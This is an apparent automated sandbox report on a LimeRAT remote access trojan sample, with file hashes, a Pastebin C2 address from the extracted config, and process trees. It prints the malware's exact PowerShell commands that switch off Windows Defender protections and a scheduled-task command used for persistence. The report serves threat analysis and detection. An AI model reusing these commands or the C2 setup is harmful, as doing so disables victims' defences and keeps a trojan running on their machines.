Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26-12-2023 22:44
Behavioral task
behavioral1
Sample
93a51bb3d03a1cebf76e63d8bdb3af04.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
93a51bb3d03a1cebf76e63d8bdb3af04.exe
Resource
win10v2004-20231215-en
General
-
Target
93a51bb3d03a1cebf76e63d8bdb3af04.exe
-
Size
684KB
-
MD5
93a51bb3d03a1cebf76e63d8bdb3af04
-
SHA1
0868306dcb3a1f21fdda94e7125ad3aa2ad2dfa9
-
SHA256
729782176df07dcab88ca6d476c8b78b6b78a104d5df713a526cbf8baad1ddb5
-
SHA512
17c69bdbfbe71e80dbca83b967b6d9d77a4f63e0ea46b4c418ed7b3f318cda4603c8245b06a4d67a897baf8d8c2899bfb5da2932b0aea52d8c217752eeccc830
-
SSDEEP
12288:0JOpPEhZTl8pBRxhHLMmyLgIO3GsaMJcR/Vn+R9KVYszf:0JyPEhZB8pBlHomy0IO3GsId+R9KV1f
Malware Config
Extracted
limerat
-
antivm
false
-
c2_url
https://pastebin.com/raw/tDBQY6gT
-
download_payload
false
-
install
false
-
pin_spread
false
-
usb_spread
false
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x0034000000015c63-31.dat disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 2968 .exe 2668 temp.exe 2332 Window Security Notification.exe -
Loads dropped DLL 8 IoCs
pid Process 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 2968 .exe 2968 .exe 2968 .exe 2332 Window Security Notification.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x0033000000015c6f-25.dat agile_net -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2876 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1396 powershell.exe 2056 powershell.exe 652 powershell.exe 1572 powershell.exe 2856 powershell.exe 688 powershell.exe 876 powershell.exe 3060 powershell.exe 2932 powershell.exe 2888 powershell.exe 1468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 2668 temp.exe Token: SeDebugPrivilege 2332 Window Security Notification.exe Token: SeDebugPrivilege 2332 Window Security Notification.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2420 wrote to memory of 2748 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 28 PID 2420 wrote to memory of 2748 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 28 PID 2420 wrote to memory of 2748 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 28 PID 2420 wrote to memory of 2748 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 28 PID 2420 wrote to memory of 2968 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 29 PID 2420 wrote to memory of 2968 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 29 PID 2420 wrote to memory of 2968 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 29 PID 2420 wrote to memory of 2968 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 29 PID 2420 wrote to memory of 2668 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 30 PID 2420 wrote to memory of 2668 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 30 PID 2420 wrote to memory of 2668 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 30 PID 2420 wrote to memory of 2668 2420 93a51bb3d03a1cebf76e63d8bdb3af04.exe 30 PID 2748 wrote to memory of 2672 2748 WScript.exe 31 PID 2748 wrote to memory of 2672 2748 WScript.exe 31 PID 2748 wrote to memory of 2672 2748 WScript.exe 31 PID 2748 wrote to memory of 2672 2748 WScript.exe 31 PID 2672 wrote to memory of 2056 2672 WScript.exe 32 PID 2672 wrote to memory of 2056 2672 WScript.exe 32 PID 2672 wrote to memory of 2056 2672 WScript.exe 32 PID 2672 wrote to memory of 2056 2672 WScript.exe 32 PID 2672 wrote to memory of 652 2672 WScript.exe 33 PID 2672 wrote to memory of 652 2672 WScript.exe 33 PID 2672 wrote to memory of 652 2672 WScript.exe 33 PID 2672 wrote to memory of 652 2672 WScript.exe 33 PID 2672 wrote to memory of 1396 2672 WScript.exe 37 PID 2672 wrote to memory of 1396 2672 WScript.exe 37 PID 2672 wrote to memory of 1396 2672 WScript.exe 37 PID 2672 wrote to memory of 1396 2672 WScript.exe 37 PID 2672 wrote to memory of 688 2672 WScript.exe 40 PID 2672 wrote to memory of 688 2672 WScript.exe 40 PID 2672 wrote to memory of 688 2672 WScript.exe 40 PID 2672 wrote to memory of 688 2672 WScript.exe 40 PID 2672 wrote to memory of 1572 2672 WScript.exe 39 PID 2672 wrote to memory of 1572 2672 WScript.exe 39 PID 2672 wrote to memory of 1572 2672 WScript.exe 39 PID 2672 wrote to memory of 1572 2672 WScript.exe 39 PID 2672 wrote to memory of 876 2672 WScript.exe 42 PID 2672 wrote to memory of 876 2672 WScript.exe 42 PID 2672 wrote to memory of 876 2672 WScript.exe 42 PID 2672 wrote to memory of 876 2672 WScript.exe 42 PID 2672 wrote to memory of 2856 2672 WScript.exe 41 PID 2672 wrote to memory of 2856 2672 WScript.exe 41 PID 2672 wrote to memory of 2856 2672 WScript.exe 41 PID 2672 wrote to memory of 2856 2672 WScript.exe 41 PID 2672 wrote to memory of 2888 2672 WScript.exe 46 PID 2672 wrote to memory of 2888 2672 WScript.exe 46 PID 2672 wrote to memory of 2888 2672 WScript.exe 46 PID 2672 wrote to memory of 2888 2672 WScript.exe 46 PID 2672 wrote to memory of 2932 2672 WScript.exe 48 PID 2672 wrote to memory of 2932 2672 WScript.exe 48 PID 2672 wrote to memory of 2932 2672 WScript.exe 48 PID 2672 wrote to memory of 2932 2672 WScript.exe 48 PID 2672 wrote to memory of 3060 2672 WScript.exe 50 PID 2672 wrote to memory of 3060 2672 WScript.exe 50 PID 2672 wrote to memory of 3060 2672 WScript.exe 50 PID 2672 wrote to memory of 3060 2672 WScript.exe 50 PID 2672 wrote to memory of 1468 2672 WScript.exe 52 PID 2672 wrote to memory of 1468 2672 WScript.exe 52 PID 2672 wrote to memory of 1468 2672 WScript.exe 52 PID 2672 wrote to memory of 1468 2672 WScript.exe 52 PID 2668 wrote to memory of 2084 2668 temp.exe 55 PID 2668 wrote to memory of 2084 2668 temp.exe 55 PID 2668 wrote to memory of 2084 2668 temp.exe 55 PID 2968 wrote to memory of 2876 2968 .exe 56
Processes
-
C:\Users\Admin\AppData\Local\Temp\93a51bb3d03a1cebf76e63d8bdb3af04.exe"C:\Users\Admin\AppData\Local\Temp\93a51bb3d03a1cebf76e63d8bdb3af04.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\script.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\SysWOW64\WScript.exe" "C:\ProgramData\script.vbs" /elevate3⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
-
-
C:\ProgramData\.exe"C:\ProgramData\.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\System32\Window Security Notification.exe'"3⤵
- Creates scheduled task(s)
PID:2876
-
-
C:\Users\Admin\System32\Window Security Notification.exe"C:\Users\Admin\System32\Window Security Notification.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
-
C:\ProgramData\temp.exe"C:\ProgramData\temp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2668 -s 9643⤵PID:2084
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
313KB
MD5bfe968b719b9567e0914105d2f5f80a4
SHA1de78dee76dec96235312fa82ebebc51f114483c9
SHA256a96147860e86e8f6a898e7bf77c05596790595c10a63271a2dce89d56fc49dac
SHA51287040e0beacfdbce3a401e09bb912e67544f7f0cd8de6bacbf710fddd6ac5e143dca08049de006d844b8b50131de98f56faf953328f40aaedfa2675186d5d5d4
-
Filesize
1KB
MD5dd82baf02caac1567f2277edca89a912
SHA136f5d8c2a67f31768b1116bb87f77b049ffd3f63
SHA256038802b33f5e7179ad59105099681003c68fdb9b3c757540e737564c1b460533
SHA5126825e10fbb3fec3619cd0b2d36f6490f28301fd723fa9b2b52403aa3d8c2e39b7bb04eedc937c5fdf76f511e9e75e533ef6cfce07d398fe13b52896c3e343554
-
Filesize
10KB
MD5c26e4cd9bc956f25ec249bcb75900ab2
SHA1f2a80a50639ec0c5a438c867b37ca03df286017c
SHA25680b261cf3b2206cd8786afd2b401b83dab0b97bf13d128d846910b61fde01876
SHA51271b9efcab7aae3da89e0694f29879ac786c465a9510d8b43f0ce5f629fdda3ab6be899992b7d6e94ad6ba7558cb8b4e6f29f572b188534f68e33a792e5308387
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CUNXMH97IVJK47EGPN0Z.temp
Filesize7KB
MD512307db3ca17a9165e917caa4a3f36d5
SHA1342ba76fe4db334f7356dc0b0b124fbeaae2b8da
SHA256b550d575f5483ad44ca444849981f574105de6bb8feb18537b4f76a16d2272fc
SHA51233390e99c6ab6a8a82f87f082be364addb518fa793041ef678742652afd4871b2b3538ea26847c19be95234fc3e5a93a531948e7e2bb98541afd104b70e37b73
-
Filesize
140KB
MD5edd74be9723cdc6a5692954f0e51c9f3
SHA1e9fb66ceee1ba4ce7e5b8271b3e1ed7cb9acf686
SHA25655ff1e0a4e5866d565ceeb9baafac73fdcb4464160fc6c78104d935009935cd7
SHA51280abecdd07f364283f216d8f4d90a4da3efd4561900631fce05c2916afeb1b5bbce23ae92d57430b7b2b06c172b2ad701b2ab75b6dfd2a861abcf7edc38462f3